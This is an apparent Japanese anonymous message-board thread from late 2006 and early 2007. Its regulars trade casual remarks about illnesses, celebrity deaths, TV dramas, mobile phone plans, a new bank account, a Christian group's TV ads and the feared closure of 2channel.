226 :おいら名無しさん(´ー`)ノ :2006/12/19(火) 07:21:23 ID:???
40どの熱が・・

227 :花粉ちゃん:2006/12/19(火) 10:09:48 ID:???
おだいじに。
実は私もきのうから激しい悪寒と下痢と吐き気です。
冗談が本当になりました。

228 :花粉ちゃん:2006/12/19(火) 11:44:35 ID:???
熱のあるときはメイトーのホットレモン(粉をお湯で溶かすタイプ)が妙にうまいです。

229 :花粉ちゃん:2006/12/19(火) 21:22:25 ID:???
> TBSは19日、情報番組「はなまるマーケット」で紹介したトイレ掃除法が
> 「便器を破損させる恐れがある」として、同種の方法を試さないよう同番組と
> 番組ホームページで呼びかけた。

230 :花粉ちゃん:2006/12/19(火) 21:25:35 ID:???
私の個人情報が漏れ漏れました!
gooからこんなメールが!

> 本メールは昨年10〜11月に、
> 弊社が実施いたしました「豪華商品ザクザク!キャンペーン」にご応募
> いただいたお客様宛に送らせていただいております。
> 昨日、弊社の社員宅にて、お客様からご登録いただいた情報等が入った
> 個人用ノートパソコンが盗難にあうという事態が発生いたしました。

231 :おいら名無しさん(´ー`)ノ :2006/12/20(水) 03:38:08 ID:???
ガビん

232 :おいら名無しさん(´ー`)ノ :2006/12/20(水) 03:50:43 ID:???
焼き肉のたれじゃなく冬眠で生き延びた
 兵庫県の六甲山で約3週間遭難し「焼き肉のたれで生き延びた」と伝えられた西宮市職員打越三敬さん(35)が19日退院し会見。遭難2日後の10月9日に意識を失い、31日に発見されるまで20日以上食べ物だけでなく、水すら飲んでいなかったことが分かった。

 会見に同席した医師は「体温が約22度という極度の低体温症だった。動物の冬眠に近かったのではないか。驚異的な生命力だ」と説明。保護時はほとんどの臓器が機能停止状態だったが、現在は後遺症を残さずに回復した。


233 :おいら名無しさん(´ー`)ノ :2006/12/20(水) 03:51:55 ID:???
隊長が治らないし、わたしがいったづぼらやが、ノロウィスル騒ぎを刷る絵s

234 :花粉ちゃん:2006/12/20(水) 09:32:34 ID:???
みずからづぼら(手抜き・怠け者)と言ってる店ですからね。

235 :花粉ちゃん:2006/12/20(水) 09:42:22 ID:???
エバラ焼肉のたれの株買った人ショック死ですね。

236 :花粉ちゃん:2006/12/20(水) 09:43:42 ID:???
月曜の夕方に発症して丸二日間倒れてました。
おいしい鍋焼きうどんが食べたい。

237 :花粉ちゃん:2006/12/20(水) 10:43:22 ID:???
ニセ学位問題で、吉村作治氏が学長を務める
サイバー大学のイメージがた落ちですね。

238 :花粉ちゃん:2006/12/20(水) 11:42:05 ID:???
語尾に「ね」が多すぎる花粉ちゃん。

239 :おいら名無しさん(´ー`)ノ :2006/12/20(水) 13:14:16 ID:???
青島が死んだ

240 :花粉ちゃん:2006/12/20(水) 13:27:16 ID:???
青島!

241 :おいら名無しさん(´ー`)ノ :2006/12/20(水) 13:28:47 ID:???
等植木のほうが年上なんですね

242 :花粉ちゃん:2006/12/20(水) 13:59:56 ID:???
私の記憶の中ではヒトシはすでに5回くらい死んでますよ?

243 :花粉ちゃん:2006/12/20(水) 14:01:06 ID:???
青島の件でコメントのためにザ・ワイドに生出演中の
藤本義一がこの20年間まったく年を取っていない!

244 :花粉ちゃん:2006/12/20(水) 16:20:55 ID:???
岸田今日子さんも!

245 :ミギ:2006/12/20(水) 17:53:26 ID:???
なんと

246 :おいら名無しさんヽ(´ー`)ノ:2006/12/20(水) 18:45:39 ID:???
岸田今日子さんはすごいですね。

247 :ミギ:2006/12/20(水) 20:51:15 ID:???
山田勇のコメントを聞きたい

248 :花粉ちゃん:2006/12/20(水) 20:53:13 ID:???
ノックですか?

249 :花粉ちゃん:2006/12/20(水) 20:53:55 ID:???
岸田さんはかなり悲しいです。
大昔に岸田森さんが亡くなったとき並みのショック。

250 :花粉ちゃん:2006/12/20(水) 21:15:06 ID:???
カンニング中島まで!

251 :花粉ちゃん:2006/12/20(水) 21:15:35 ID:???
みんな死ぬ!

252 :ミギ:2006/12/20(水) 22:03:52 ID:???
うおおおおおお

253 :ミギ:2006/12/20(水) 22:10:37 ID:???
みんな死ぬ……

254 :ミギ:2006/12/20(水) 22:40:01 ID:???
茶は大丈夫なのだろうか…

255 :花粉ちゃん:2006/12/20(水) 23:02:15 ID:???
茶も年内ですかね・・

256 :花粉ちゃん:2006/12/20(水) 23:33:06 ID:???
うぉぉニュースJAPANのトップ項目がカンニング中島です!
えらい扱いや!

257 :おいら名無しさん(´ー`)ノ :2006/12/21(木) 10:09:04 ID:???
青島がらみでなべおさみがブラウン管に

258 :おいら名無しさん(´ー`)ノ :2006/12/21(木) 12:10:29 ID:???
IZAM嬢との件は別にして
http://www.cosmo-oil.co.jp/tvcm/cashback/index.html
この吉岡さんは可愛いと思います

259 :おいら名無しさん(´ー`)ノ :2006/12/21(木) 12:19:41 ID:???
昨日自分が病気で弱っているときに3本の訃報の知らせで、特に最後のカンニングの件は
ショックで気が落ちました

260 :おいら名無しさん(´ー`)ノ :2006/12/21(木) 12:22:17 ID:???
>>258のCMは小さいです
早くGYAOでもなんでもいいので、CM契約関係を整理させて、
CMだけいつでも見られる体制整えてくれないと!!高画質で

(商品名・女優名等で検索できて見られる

261 :(○´ー`○)麦なっち ◆ZlwGjxBiIQ :2006/12/21(木) 18:14:44 ID:???
そうなんだ〜

262 :おいら名無しさん(´ー`)ノ :2006/12/21(木) 18:35:24 ID:???
あ、麦なっち さんこんばんは

263 :おいら名無しさん(´ー`)ノ :2006/12/21(木) 18:41:08 ID:???
久米氏は朝日新聞の取材に対し「最近、(抗議があったことを)ネット上でたまたま知りました。10年前は知りませんでした」とコメントした。

264 :おいら名無しさん(´ー`)ノ :2006/12/21(木) 18:41:39 ID:???
自分の名前を検索していたのですかね

265 :花粉ちゃん:2006/12/25(月) 13:09:07 ID:???
麦なっつ!

266 :花粉ちゃん:2006/12/25(月) 13:09:44 ID:???
規制されてました (´ー` ) 誰がわるさしとんねん?

267 :おいら名無しさん(´ー`)ノ :2006/12/25(月) 20:34:43 ID:???
心臓を停止させた上で手術!

268 :花粉ちゃん:2006/12/25(月) 20:40:56 ID:???
チャー!

269 :花粉ちゃん:2006/12/26(火) 10:21:42 ID:???
安藤さん・・

270 :おいら名無しさんヽ(´ー`)ノ:2006/12/26(火) 18:59:14 ID:???
びばびばけっこんびばけっこん♪

271 :花粉ちゃん:2006/12/26(火) 21:30:34 ID:???
三ツ矢サイダーはたまに飲むとものすごくウマイです。

272 :花粉ちゃん:2006/12/27(水) 19:15:02 ID:???
フォード元コメ大統領も!

273 :おいら名無しさん(´ー`)ノ :2006/12/27(水) 19:43:39 ID:???
知らない人です

274 :おいら名無しさんヽ(´ー`)ノ:2006/12/28(木) 00:27:18 ID:???
家電ドットコム!

275 :花粉ちゃん:2006/12/28(木) 11:27:29 ID:???
そんなメジャーっぽい名前のところが詐欺するなんて!

276 :花粉ちゃん:2006/12/28(木) 18:04:20 ID:???
●ノ ヤー

277 :花粉ちゃん:2006/12/28(木) 18:05:30 ID:???
●ノ ヤー

278 :花粉ちゃん:2006/12/28(木) 18:06:11 ID:???
ちょっと違うなぁ・・

279 :おいら名無しさん(´ー`)ノ :2006/12/28(木) 20:35:36 ID:???
そんな感じだった気もします

280 :おいら名無しさん(´ー`)ノ :2006/12/28(木) 20:49:07 ID:???
やはり私の目の黒いうちに渡辺大臣が誕生してしまった事実を考えるに
自分の無力を感じずに入られません

281 :花粉ちゃん:2006/12/28(木) 21:21:49 ID:???
親父に見せたかったでしょう。

282 :おいら名無しさんヽ(´ー`)ノ:2006/12/29(金) 07:31:10 ID:???
ああっ 移転とは。。

283 :おいら名無しさん(´ー`)ノ :2006/12/29(金) 07:32:37 ID:???
naaemo/

284 :花粉ちゃん:2006/12/30(土) 14:43:16 ID:???
フセインが!

285 :おいら名無しさん(´ー`)ノ :2006/12/30(土) 15:19:07 ID:???
死んだ

286 :花粉ちゃん:2006/12/30(土) 21:00:04 ID:???
みんな死ぬ!

287 :花粉ちゃん:2006/12/30(土) 21:00:40 ID:???
今夜の久米の特番が恐るべき低視聴率だったらいいのになぁと夢想。

288 :花粉ちゃん:2006/12/30(土) 21:18:38 ID:???
有頂天ホテルおもしろいですね。

289 :花粉ちゃん:2006/12/30(土) 23:20:38 ID:???
香取さんいりませんね。

290 :ミギ:2006/12/31(日) 11:59:23 ID:???
いりません

291 :ミギ:2006/12/31(日) 16:11:35 ID:???
有頂天ホテルはもう少し面白くできたはずなんです

292 :おいら名無しさんヽ(´ー`)ノ:2006/12/31(日) 17:46:20 ID:???
見た事がありません。

293 :おいら名無しさん(´ー`)ノ :2006/12/31(日) 18:12:32 ID:???
SED駄目送電

294 :花粉ちゃん:2007/01/01(月) 00:31:01 ID:???
紅白おっぱい

295 :おいら名無しさん(´ー`)ノ :2007/01/01(月) 07:03:00 ID:???
ganbarou

296 :おいら名無しさん(´ー`)ノ :2007/01/01(月) 09:58:33 ID:???
ttp://up.nm78.com/old/data/up122014.jpg

297 :花粉ちゃん:2007/01/01(月) 12:02:12 ID:???
ああ美しい!

298 :花粉ちゃん:2007/01/01(月) 12:07:06 ID:???
和希さん、大笑点に出てたんですか?

299 :花粉ちゃん:2007/01/01(月) 12:07:55 ID:???
なぜかわいいタレントさんはみな学会員なのか。

300 :おいら名無しさんヽ(´ー`)ノ:2007/01/01(月) 21:07:30 ID:???
そうなんですか?

301 :おいら名無しさん(´ー`)ノ :2007/01/01(月) 21:53:09 ID:???
和希さんは安定して可愛いですね

302 :花粉ちゃん:2007/01/01(月) 21:57:38 ID:???
>>300
そうか? って聞くのが2ちゃん流ではないでしょうか。

303 :花粉ちゃん:2007/01/01(月) 22:00:10 ID:???
『クイズ!紳助くん』で和希さんを毎週見れます。
たいへんかわいいです。
頭の回転が早くてトークも面白いです。

304 :おいら名無しさん(´ー`)ノ :2007/01/03(水) 08:33:38 ID:???
http://www2.odn.ne.jp/~aat19920/humei0.html

これ連絡先わからないというだけで載せていいんでしょうか???
私は嫌です

305 :花粉ちゃん:2007/01/03(水) 09:33:50 ID:???
偽名で入学するといいです。

306 :花粉ちゃん:2007/01/04(木) 18:12:38 ID:???
そのまんま東氏がエビちゃんで宮崎PR案

307 :おいら名無しさん(´ー`)ノ :2007/01/04(木) 19:49:04 ID:???
damedesumne

308 :花粉ちゃん:2007/01/04(木) 19:59:49 ID:???
キャンディーズかわいいですねぇ

309 :おいら名無しさん(´ー`)ノ :2007/01/04(木) 20:04:03 ID:???
夢が無い・・

310 :花粉ちゃん:2007/01/04(木) 20:07:40 ID:???
キャンディーズのラジオ番組の常連投稿野郎でした。

311 :花粉ちゃん:2007/01/04(木) 20:13:11 ID:???
死にかけてた茶氏が最近かけてる眼鏡がけっこう気に入ってます。

312 :おいら名無しさん(´ー`)ノ :2007/01/04(木) 20:14:14 ID:???
茶も良く生きてますねありゃ
信仰のおかげですかね?

313 :おいら名無しさんヽ(´ー`)ノ:2007/01/04(木) 20:14:44 ID:???
まさか?そうか?

314 :花粉ちゃん:2007/01/04(木) 20:15:55 ID:???
学会め!

315 :花粉ちゃん:2007/01/04(木) 20:17:02 ID:???
我々3人がリアルタイムで集うのは非常に珍しいことです。

316 :花粉ちゃん:2007/01/04(木) 20:18:42 ID:???
血管が裂けていく病気にかかって助かるなんて普通じゃない。

317 :花粉ちゃん:2007/01/04(木) 20:21:18 ID:???
BS2見てるんですが、キャンディーズがかわいすぎて耳から何か出てきそうです!
このころ私は中学3年でした。
戻りたい。

318 :おいら名無しさん(´ー`)ノ :2007/01/04(木) 20:26:19 ID:???
それの最後のところをこの前見たんですよ
アレは神がかり映像ですね

319 :おいら名無しさんヽ(´ー`)ノ:2007/01/04(木) 20:26:40 ID:???
>>315
よく3人だと解りましたね。

320 :おいら名無しさん(´ー`)ノ :2007/01/04(木) 20:28:20 ID:???
>>183
のとき見ました本放送?

321 :花粉ちゃん:2007/01/04(木) 20:31:30 ID:???
そうです。いま再放送やってます。
中学生のころ本当に本当に大好きで、友人たちといっしょに
解散阻止のために事務所を襲撃する計画を練り続けてました。

322 :花粉ちゃん:2007/01/04(木) 20:34:21 ID:???
今の二十代の方たちはランちゃんのことを常に怒った顔の演技ばっかりしてる
いまひとつパッとしないおばさん女優としか認識してませんよね。

323 :おいら名無しさんヽ(´ー`)ノ:2007/01/04(木) 20:37:37 ID:???
こころのおかみさんですね。

324 :花粉ちゃん:2007/01/04(木) 20:41:53 ID:???
中越典子さんもけっこう好きです。

325 :花粉ちゃん:2007/01/04(木) 20:53:49 ID:???
「あなたは夢がないね」って・・

326 :花粉ちゃん:2007/01/05(金) 12:10:32 ID:???
バラバラ妹のブログらしいです。
http://72.14.235.104/search?q=cache:xz24Q7PamJsJ:yaplog.jp/takaminekakeru/+%E9%AB%98%E5%B3%AF%E9%A7%86&hl=ja&gl=jp&ct=clnk&cd=1&lr=lang_ja

327 :花粉ちゃん:2007/01/05(金) 14:37:06 ID:???
> 光と影のような関係か…三浪の兄、映画出演の妹 渋谷バラバラ殺人

328 :おいら名無しさん(´ー`)ノ :2007/01/05(金) 19:49:41 ID:???
猟奇殺人です

329 :おいら名無しさん(´ー`)ノ :2007/01/05(金) 19:51:58 ID:???
ソフトバンk携帯は二台目に欲しいすえん

330 :おいら名無しさん(´ー`)ノ :2007/01/05(金) 19:56:18 ID:???
SB携帯凄くお得な気がしてきました

331 :おいら名無しさん(´ー`)ノ :2007/01/05(金) 20:00:41 ID:???
月千円ちょっとで、誰にでも公開できて、夜以外通話無料というのは新しい遊びとして
成立しなくもないとおもいます

332 :おいら名無しさん(´ー`)ノ :2007/01/05(金) 20:01:26 ID:???
誰にでも公開できてと言うのは使い方の提案です

333 :花粉ちゃん:2007/01/05(金) 20:04:24 ID:???
SB相手の通話しかしなければ本当の本当に980円だけなんですか?

334 :花粉ちゃん:2007/01/05(金) 20:05:22 ID:???
>>331
そのアイデアものすごくビビビと来ました。

335 :おいら名無しさん(´ー`)ノ :2007/01/05(金) 20:12:10 ID:???
980円です

336 :おいら名無しさん(´ー`)ノ :2007/01/05(金) 20:12:45 ID:???
じゃあ千円ちょっとじゃないじゃないか!!!

337 :おいら名無しさん(´ー`)ノ :2007/01/05(金) 20:14:17 ID:???
基本料金が下がれば、待ちうけ専用にも出来ますし、
でもネットが高いから
ネット無料にすればもっとよい

338 :花粉ちゃん:2007/01/05(金) 20:15:30 ID:???
会社で内線電話みたいに使いまくれるじゃないですか。

339 :花粉ちゃん:2007/01/05(金) 20:18:05 ID:???
マグロ、ご期待ください!

340 :おいら名無しさん(´ー`)ノ :2007/01/05(金) 20:19:32 ID:???
石原プロの真実の会計をのぞいてみたい

341 :おいら名無しさん(´ー`)ノ :2007/01/05(金) 20:26:34 ID:???
純粋に法人はこれもてば昼間無料なので、
はかりしれない

342 :花粉ちゃん:2007/01/05(金) 22:35:34 ID:???
くまぇりも!

343 :おいら名無しさん(´ー`)ノ :2007/01/06(土) 07:09:40 ID:???
安藤百福も!

344 :おいら名無しさん(´ー`)ノ :2007/01/06(土) 09:31:35 ID:???
http://www.tv-asahi.co.jp/yajiplus/contents/weather06/0095/img/1_5.JPG

345 :おいら名無しさん(´ー`)ノ :2007/01/06(土) 09:34:23 ID:???
tp://kinsen-tawatawawa.seesaa.net/article/30221234.html

346 :花粉ちゃん:2007/01/06(土) 11:11:35 ID:???
じゃあチキンラーメン生産中止になるんですか!?

347 :花粉ちゃん:2007/01/06(土) 11:12:55 ID:???
甲斐さんに関しては世間で騒がれるようになる前に注目していた自分が誇らしいです。

348 :花粉ちゃん:2007/01/06(土) 11:24:53 ID:???
ひさしぶりに元祖カップヌードルを食べたらカップの口の内側に
微妙なテーパーが追加されてました。マイナーチェンジですね。

349 :おいら名無しさん(´ー`)ノ :2007/01/06(土) 12:44:16 ID:???
web3.0あたりでそろそろふりがなをふれるようにして欲しい

350 :おいら名無しさん(´ー`)ノ :2007/01/06(土) 12:46:17 ID:???
ワタシノアマゾンノパスガオモイダセナイ

351 :おいら名無しさん(´ー`)ノ :2007/01/06(土) 12:50:29 ID:???
思い出しましたが金が無いので変えません

352 :花粉ちゃん:2007/01/06(土) 13:11:29 ID:???
ずいぶん前からふりがなは振れるようになってますよ。
ほとんど誰も使ってませんが。
「HTML ルビ」で閣下にお伺いを立ててみてください。

353 :花粉ちゃん:2007/01/06(土) 13:12:43 ID:???
アマゾンの古本で26円っていうのが複数から出品されてるんですが
この数字って特別な意味があるんでしょうか。
すごく気になります。

354 :花粉ちゃん:2007/01/06(土) 13:13:22 ID:???
ソフトバンク携帯本当の本当の本当に980円だけなんだったらまじで買います。

355 :おいら名無しさんヽ(´ー`)ノ:2007/01/06(土) 13:37:52 ID:???
あぶりだしが出るまで待ちましょう。

356 :おいら名無しさんヽ(´ー`)ノ:2007/01/06(土) 14:55:38 ID:???
> 結局、ゴールドに飛びついた人間がバカ見るって事?

てか、プラン変更できるわけだから、15日までにとりあえずゴールドに入って、数ヶ月無料を満喫したあと、ホワイトへ移るのが最強では?

357 :花粉ちゃん:2007/01/06(土) 14:59:26 ID:???
ゴールドを中途解約したら違約金取られるってことなんじゃないですか?

358 :おいら名無しさんヽ(´ー`)ノ:2007/01/06(土) 15:32:22 ID:???
取られるんでしょうかね?

359 :おいら名無しさん(´ー`)ノ :2007/01/06(土) 16:06:58 ID:???
http://e8y.net/labs/lou_trans/?url=http%3A%2F%2Fhomepage1.nifty.com%2Fnikkenkyo%2F2konnakoto%2F719kaigo%2Fkaigo.htm

360 :おいら名無しさん(´ー`)ノ :2007/01/06(土) 16:09:17 ID:???
http://e8y.net/labs/lou_trans/?url=http%3A%2F%2Fwww.yomiuri.co.jp%2Ffeatures%2Fimpr%2Finyoudujjfijhvli0654848027815468nvfhvyywowej_01.htm

361 :おいら名無しさん(´ー`)ノ :2007/01/06(土) 16:10:13 ID:???
4,5回まではおもしろいです

362 :おいら名無しさん(´ー`)ノ :2007/01/06(土) 16:11:18 ID:???
http://e8y.net/labs/lou_trans/?url=http%3A%2F%2Fwww.itoyama.org%2Fcontents%2Fjp%2Fdays%2F2007%2F0101.html

363 :花粉ちゃん:2007/01/06(土) 16:37:22 ID:???
ルー本人の芸風を忘れてしまいました。

364 :おいら名無しさん(´ー`)ノ :2007/01/06(土) 20:18:44 ID:???
ネット使い放題で2千円とか3千円とかいう値段出して来たら即ソフトバンクでやんすが
現状だと乗り換えられmm

私はAUのプランSSでダブル停学なので8千ンほどかかります毎月

365 :おいら名無しさん(´ー`)ノ :2007/01/06(土) 20:21:48 ID:???
団塊を埋めたい衝動に駆られる

366 :花粉ちゃん:2007/01/06(土) 22:30:47 ID:???
私も団塊を埋めたい

367 :花粉ちゃん:2007/01/07(日) 16:56:12 ID:???
近いうちにコレ
http://www.powerforliving.jp/
が世間を騒がせそうです。

368 :花粉ちゃん:2007/01/07(日) 19:38:16 ID:???
防衛省・・

369 :おいら名無しさん(´ー`)ノ :2007/01/07(日) 19:44:46 ID:???
何の話題にもならなかったですヨネこれ?

370 :おいら名無しさん(´ー`)ノ :2007/01/07(日) 19:47:43 ID:???
13年前だったら騒ぎでしょう

371 :おいら名無しさん(´ー`)ノ :2007/01/07(日) 19:48:46 ID:???
>>367
ヤバイ系ですか?

372 :花粉ちゃん:2007/01/07(日) 20:07:41 ID:???
キリスト教というのはわかるんですが、TVCMが怪しすぎるんです。
出演してる元久保田早紀の久米小百合氏の目付きや話し方がイッてます。
驚異的な資金力を持ってそうな気配がします。

373 :花粉ちゃん:2007/01/07(日) 20:10:20 ID:???
防衛省絡みでまったく騒ぎになってないのが恐ろしいです。

374 :おいら名無しさん(´ー`)ノ :2007/01/07(日) 20:31:26 ID:???
なんもないですねえ

375 :花粉ちゃん:2007/01/07(日) 20:35:23 ID:???
ユウキ容疑者

376 :花粉ちゃん:2007/01/07(日) 20:36:47 ID:???
ホリエモン言いたい放題ですな!

377 :花粉ちゃん:2007/01/08(月) 15:19:44 ID:???
>>367
2ちゃんねるでも話題になり始めました。

378 :おいら名無しさんヽ(´ー`)ノ:2007/01/08(月) 16:58:44 ID:???
どのあたりでですか?

379 :おいら名無しさん(´ー`)ノ :2007/01/08(月) 20:07:17 ID:???
http://blog.goo.ne.jp/index.php?fid=trendranking

ここのランキング一位の新生銀行なのですが、
リンク先を見ると、ほぼ物凄い型にはまった宣伝文章しかありません。
こういう宣伝方法が既に普及しているのでしょうか?
リンク先ブログも何件か見ましたが、何の脈絡も泣く宣伝してあるところ
もあれば、「宣伝専門ブログ」みたいなのもあって・・

380 :おいら名無しさん(´ー`)ノ :2007/01/08(月) 20:09:53 ID:???
宣伝ブログでリンク先からお金を貰うという業界が確立されてる??

381 :おいら名無しさん(´ー`)ノ :2007/01/08(月) 20:10:28 ID:???
よくわからあん¥

382 :おいら名無しさんヽ(´ー`)ノ:2007/01/08(月) 20:52:28 ID:???
宣伝の為だけのブログとかあるみたいですね。

383 :花粉ちゃん:2007/01/08(月) 21:46:47 ID:???
ニュース速報です。

384 :花粉ちゃん:2007/01/08(月) 21:51:05 ID:???
なんかまじで新生銀行に口座作りたくなりました。

385 :花粉ちゃん:2007/01/08(月) 21:52:31 ID:???
これこそまさにアフィリエイトですね。

386 :おいら名無しさんヽ(´ー`)ノ:2007/01/08(月) 22:39:15 ID:???
CM板にもありました。

387 :花粉ちゃん:2007/01/08(月) 23:12:24 ID:???
宗教板にもありますね。

388 :花粉ちゃん:2007/01/09(火) 11:51:02 ID:???
ヤマタクはいったい何をやってるんですか?

389 :花粉ちゃん:2007/01/09(火) 16:26:35 ID:???
団塊ジュニアも埋めたい

390 :花粉ちゃん:2007/01/09(火) 16:52:41 ID:???
外はカリカリ 中はイガイガ

391 :花粉ちゃん:2007/01/09(火) 17:28:39 ID:???
ナインティナインって名前、よく考えたらただの数字じゃないですか。

392 :おいら名無しさんヽ(´ー`)ノ:2007/01/09(火) 17:51:12 ID:???
http://news22.2ch.net/test/read.cgi/newsplus/1168330663/

393 :花粉ちゃん:2007/01/09(火) 18:00:38 ID:???
ものすごい資金力がありそうですね。

394 :おいら名無しさん(´ー`)ノ :2007/01/09(火) 20:12:50 ID:???
konodanntainoCMみたことないんですよ
私テレビのCMはほっとんど最近見ないんです

395 :おいら名無しさん(´ー`)ノ :2007/01/09(火) 20:13:45 ID:???
ただの慰安旅行だったらやですね

396 :花粉ちゃん:2007/01/09(火) 20:15:29 ID:???
CM専門チャンネルの実現を

397 :花粉ちゃん:2007/01/09(火) 20:16:28 ID:???
アベチャンに不快感を抱かせる慰安旅行

398 :おいら名無しさん(´ー`)ノ :2007/01/09(火) 20:33:59 ID:???
ペンティアム3 800MHz でメモリが256の私はビスタど

399 :花粉ちゃん:2007/01/09(火) 20:38:23 ID:???
ビスタ難民ですね

400 :花粉ちゃん:2007/01/09(火) 20:41:28 ID:???
剣客商売の再放送を見ておりますが
やっぱり寺島しのぶはゴツいですねぇ。
きらいではないのですが。

401 :おいら名無しさん(´ー`)ノ :2007/01/09(火) 20:42:24 ID:???
三冬役に関しては私は無しです。
というか他の映像でも見たことはないですが

402 :花粉ちゃん:2007/01/09(火) 20:49:18 ID:???
大路恵美の三冬はお気に入りでした。
彼女は声がいい。

403 :花粉ちゃん:2007/01/09(火) 20:50:31 ID:???
今度生まれ変わるならスタートレックもしくは剣客商売の劇中の世界がいいです。

404 :花粉ちゃん:2007/01/09(火) 21:58:37 ID:???
数年前まで葛飾区にあったあぶたま屋を復活させてくれるなら30ガバス払います!

405 :花粉ちゃん:2007/01/10(水) 04:50:07 ID:???
iPod携帯ほんとに出ちゃいましたね。

406 :ミギ:2007/01/10(水) 05:54:09 ID:???
メール打たないのであればボタンはいらないですね
あとゲームか

407 :花粉ちゃん:2007/01/10(水) 11:34:24 ID:???
たしかにかっこいいんですけど、マック信者と思われるのがいやです。

408 :花粉ちゃん:2007/01/10(水) 11:35:37 ID:???
ミギさんが新生銀行の話題を出されてから非常に気になってまして
ついに申込書を書いてしまいました。
本人確認書類がいまいち良いのがないので住民票取ってきます。

409 :花粉ちゃん:2007/01/10(水) 11:42:12 ID:???
安倍首相夫人を「昭恵夫人」と呼ぶのは日本語まちがってるような気がします。

410 :花粉ちゃん:2007/01/10(水) 11:43:46 ID:???
それにしても昭恵夫人は評判わるいですね。

411 :花粉ちゃん:2007/01/10(水) 13:06:09 ID:???
2007年の女性天皇にはこの方を推します。
http://www65.tok2.com/home2/studio191/STUDENT/chiho-t-hoto.htm

412 :花粉ちゃん:2007/01/10(水) 13:09:59 ID:???
>>411
こうして見ると松尾前陛下に似てるなぁ。
目の取り付け位置は離れ気味で、取り付け角度は寄り目気味が私の好みです。

413 :おいら名無しさん(´ー`)ノ :2007/01/10(水) 20:43:39 ID:???
ぴんときません

414 :おいら名無しさん(´ー`)ノ :2007/01/10(水) 20:45:19 ID:???
足利銀行に興味があります

415 :花粉ちゃん:2007/01/10(水) 21:18:39 ID:???
すべての引き落とし口座を新生銀行に変更するにはとんでもない労力を要します。

416 :花粉ちゃん:2007/01/10(水) 21:19:29 ID:???
新生銀行はカードの色が16色くらいから選べるのでオレンジにしました。

417 :花粉ちゃん:2007/01/11(木) 18:33:49 ID:???
32色でした。

418 :花粉ちゃん:2007/01/11(木) 18:35:18 ID:???
本当に申し込んでしまいました。
昔は手数料タダといえばシティバンクしかなかったので15年くらいずっと
使ってたんですが、どんどんサービスがわるくなっていくのでもうやめます。
新生銀行バンザイ。

419 :おいら名無しさん(´ー`)ノ :2007/01/11(木) 19:46:30 ID:???
人の運命というものはわかりませんね

420 :花粉ちゃん:2007/01/11(木) 20:00:08 ID:???
今年もいっぱいかわいい人が見れるといいな。

421 :ミギ:2007/01/12(金) 18:51:54 ID:???
前の夏の2ちゃんねるが終わりそうになったとき
あれは悲しかったです
5年くらい前ですか?

422 :おいら名無しさんヽ(´ー`)ノ:2007/01/12(金) 20:16:17 ID:???
再来週が山場なんでしょうかね?

423 :おいら名無しさん(´ー`)ノ :2007/01/12(金) 21:28:43 ID:???
高級紙の週刊文春でシーランド公国が男爵の地位を4500円で売ってると
書いてあったので 私は男爵になります

424 :おいら名無しさん(´ー`)ノ :2007/01/12(金) 21:44:31 ID:???
2ちゃんねる消滅という自体であれば数十人単位での死者が出ます
出る思います

425 :花粉ちゃん:2007/01/12(金) 21:45:53 ID:???
ぶたまんショック死ってやつですね。

426 :花粉ちゃん:2007/01/12(金) 21:49:39 ID:???
西川きよし氏がすでに爵位を持ってるという話が。

427 :花粉ちゃん:2007/01/12(金) 21:53:03 ID:???
地獄の黙示録みたいにロイ一世に暗殺部隊が送りこまれたりしませんかね?

428 :おいら名無しさん(´ー`)ノ :2007/01/12(金) 21:57:36 ID:???
私が素子瀬名花欄でしょう

429 :おいら名無しさん(´ー`)ノ :2007/01/12(金) 21:58:15 ID:???
私が阻止せねばならんでしょう

430 :おいら名無しさん(´ー`)ノ :2007/01/12(金) 22:01:11 ID:???
パワーフォーリビングの広告が週刊誌に大量にあるので(文春に2箇所)
取り寄せてみるかもしれません。
ブックオフで10円で売れるかも!?

431 :花粉ちゃん:2007/01/12(金) 22:07:22 ID:???
うっかり信者になっても知りませんよ。

432 :花粉ちゃん:2007/01/13(土) 04:01:25 ID:???
ヨッスィーの弟さんが!

433 :おいら名無しさんヽ(´ー`)ノ:2007/01/13(土) 08:43:00 ID:???
交通事故死・・・・・・

434 :花粉ちゃん:2007/01/13(土) 12:10:16 ID:???
みんな死ぬ!

435 :おいら名無しさん(´ー`)ノ :2007/01/13(土) 13:45:46 ID:???
http://news.livedoor.com/article/detail/2977124/

436 :おいら名無しさん(´ー`)ノ :2007/01/13(土) 13:56:23 ID:???
事故は避けられないこととは言え唐突なので嫌でウsね

437 :おいら名無しさん(´ー`)ノ :2007/01/13(土) 14:03:31 ID:???
本当に閉鎖するのであれば、100人以上自殺するとおもます

438 :花粉ちゃん:2007/01/13(土) 14:13:34 ID:???
グリーンの森

439 :花粉ちゃん:2007/01/13(土) 14:18:14 ID:???
グリ森事件と聞くとあのテープの子供のような声の
「空き缶の中」というフレーズが思い出されます。

440 :おいら名無しさん(´ー`)ノ :2007/01/13(土) 14:21:57 ID:???
僕は主に文献でしか知らないのでわかりません1

441 :花粉ちゃん:2007/01/13(土) 14:32:06 ID:???
( ´O`)< ジェネレーション ギャーップ!

442 :花粉ちゃん:2007/01/13(土) 14:34:04 ID:???
ミギさん当時4〜5歳でしたもんね。
私は大学留年が決定して燃えカスのようになってたころです。

443 :おいら名無しさん(´ー`)ノ :2007/01/13(土) 14:36:04 ID:???
僕の一番最初の記憶は全員集合から始まっています

444 :花粉ちゃん:2007/01/13(土) 15:45:00 ID:???
ヤマタク自画自賛

445 :おいら名無しさんヽ(´ー`)ノ:2007/01/13(土) 23:05:11 ID:???
http://tool-3.net/?ochi

446 :おいら名無しさん(´ー`)ノ :2007/01/13(土) 23:19:54 ID:???
睡眠

447 :花粉ちゃん:2007/01/13(土) 23:24:32 ID:???
PCからは見れません

448 :おいら名無しさん(´ー`)ノ :2007/01/13(土) 23:25:32 ID:???
今年はパソコンが買いたいです

449 :花粉ちゃん:2007/01/13(土) 23:47:51 ID:???
総鉄屑(ソーテック)のがいいですよ!

450 :花粉ちゃん:2007/01/13(土) 23:51:15 ID:???
> ノリ 架空キャンプに向け練習

451 :花粉ちゃん:2007/01/15(月) 17:17:46 ID:???
平沼赳夫重病説

452 :おいら名無しさん(´ー`)ノ :2007/01/15(月) 22:38:11 ID:???
政治家は生きて喋ってこそ

453 :おいら名無しさん(´ー`)ノ :2007/01/16(火) 09:38:11 ID:???
パワフォーのCMみましたよおばちゃんの

スッキリで流れてました

454 :花粉ちゃん:2007/01/16(火) 10:21:24 ID:???
元久保田早紀ですね。

455 :花粉ちゃん:2007/01/16(火) 20:40:17 ID:???
いやぁ〜 やっぱ剣客商売おもしろいです。

